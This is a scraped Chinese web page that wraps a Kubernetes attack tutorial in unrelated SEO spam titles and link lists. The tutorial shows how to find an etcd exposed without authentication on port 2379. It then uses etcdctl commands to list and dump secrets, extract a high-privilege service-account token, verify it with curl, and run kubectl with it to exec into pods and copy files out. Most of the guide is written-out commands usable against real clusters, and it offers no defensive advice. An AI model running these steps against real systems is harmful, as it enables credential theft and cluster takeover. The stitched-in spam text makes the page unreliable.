当前位置: 首页 > news >正文

重庆南川网站制作公司电话seo网络推广教程

重庆南川网站制作公司电话,seo网络推广教程,注册公司网页,网站开发专业都有哪些课程在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd&#x…

在这里插入图片描述

在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。

etcd 未授权访问

如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。

访问目标的 https://IP:2379/version 或 https://IP:2379/v2/keys,看看是否存在未授权访问。如果显示如下,则证明存在未授权访问。

image-20231222085653333

1.查找token

需要使用到 etcd 命令行连接工具:etcdctl

由于 Service Account 关联了一套凭证,存储在 Secret 中。因此我们可以过滤 Secret,查找具有高权限的 Secret,然后获得其 token 接管 K8s 集群

#查找所有的secret
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only|sort|uniq| grep secret

image-20231222090234172

从返回的数据中挑选出一个具有高权限的 role 并读取其 token,以 /registry/secrets/kube-system/dashboard-admin-token-c7spp 为例,其中 kube-system 代表 namespace、dashboard-admin 是 clusterrole

#查找指定secret保存的证书和token
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp

image-20231222090606284

复制 token,最后的 token 为 token? 和 #kubernetes.io/service-account-token 之间的部分

image-20231222112025096

如果机器上安装了 KubeOperator 存在弱口令,登录之后可以在集群中获取管控 token

image-20231222113634553

如果不知道 server api 可以通过 webkubectl 获取

kubectl cluster-info

image-20231222113822617

2.验证token有效性

curl --header "Authorization: Token" -X GET https://172.16.200.70:6443/api -k

3.使用 kebuctl 去执行命令

这里直接指定 token 去执行命令,或者可以通过制作配置文件指定配置文件来执行但是比较复杂

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods

image-20231222112738092

kebuctl 常用命令

# 查看所有的资源信息
kubectl get all
kubectl get --all-namespaces
# 获取pods列表
kubectl get pods -o wide --all-namespaces
-n 指定命令空间
-o wide 展示详细信息
# 执行命令
kubectl exec -it podsname -n namespace -- command
-- bash 进入 shell
# 下载文件
kubectl cp -n 命名空间 pod名字:/data/1.hprof(在pod中要下载文件的路径) (本地保存文件的路径)

学习文章

  • K8s集群安全攻防(上)
  • K8s集群安全攻防(下)
http://www.dt0577.cn/news/20136.html

相关文章:

  • 手机模板网站模板免费下载网络广告创意
  • 网站seo工程师怎么做最有效的宣传方式
  • 自己怎么做网站模块网络公司网站模板
  • 电子邮箱网站注册网络广告营销方案
  • 门户网站制作网站策划是什么
  • 网站制作公司业务员做神马seo快速排名软件
  • 上海静安做网站多少钱宣传软文是什么意思
  • 大良营销网站建设平台seo运营是什么
  • 北京做网站推广的公司哪家建设公司网站
  • 官方网站建设项目询价中国互联网公司排名
  • 时尚网站网页设计青岛关键词优化平台
  • 北京b2c网站制作win10系统优化工具
  • 北京网站建设最便宜的公司哪家好千锋教育培训机构就业率
  • 汽车网站建设公司哪家好怎么设置自己的网站
  • 赣州做网站哪家好搭建一个网站的流程
  • 做公司网站公司多少钱信息流广告怎么投放
  • 163网站是jsp做的吗除了小红书还有什么推广平台
  • 淄博电商网站建设产品推广策划
  • 视频网站 外链网络营销的常用方法有哪些
  • 网站上360 旋转的图是怎么做的新手怎么做网络推广
  • 哪个网站可以做公务员题超级seo助手
  • 做仿牌网站软件外包公司有哪些
  • 网站 留言 以邮件形式seo指什么
  • 需要一个网站定制营销型网站建设
  • 汽车网站制作模板网络优化软件
  • 深圳做网站电话东莞疫情最新通知
  • 湖北网站建设推荐网络媒体发稿
  • 滨州网站建设公司报价建站网站关键词优化
  • 坪山医院网站建设seo小白入门教学
  • 怎么把网站做成手机版的外链收录网站